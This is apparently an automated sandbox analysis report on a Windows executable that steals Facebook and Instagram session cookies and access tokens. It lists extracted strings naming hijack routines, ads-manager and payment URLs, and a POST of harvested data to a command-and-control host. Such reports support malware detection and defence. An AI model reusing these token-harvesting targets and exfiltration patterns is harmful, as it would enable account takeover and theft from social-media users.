same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: c8dd8ae6dc4dc644.xyz
Source: unknownHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: c8dd8ae6dc4dc644.xyz
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/ddd
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/r
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpString found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364144645.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.e
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crxx
Source: 1612045890161.exe.3.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1612045890161.exe.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1612045890161.exe.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvB803.tmp.11.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://docs.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: http://drive.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvB803.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1612045890161.exe.3.drString found in binary or memory: http://ocsp.comodoca.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0:
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0B
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0E
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0F
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0K
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0M
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0P
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.msocsp.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvB803.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: MiniThunderPlatform.exe.3.drString found in binary or memory: http://ocsp.thawte.com0
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvB803.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.3.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.3.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvB803.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
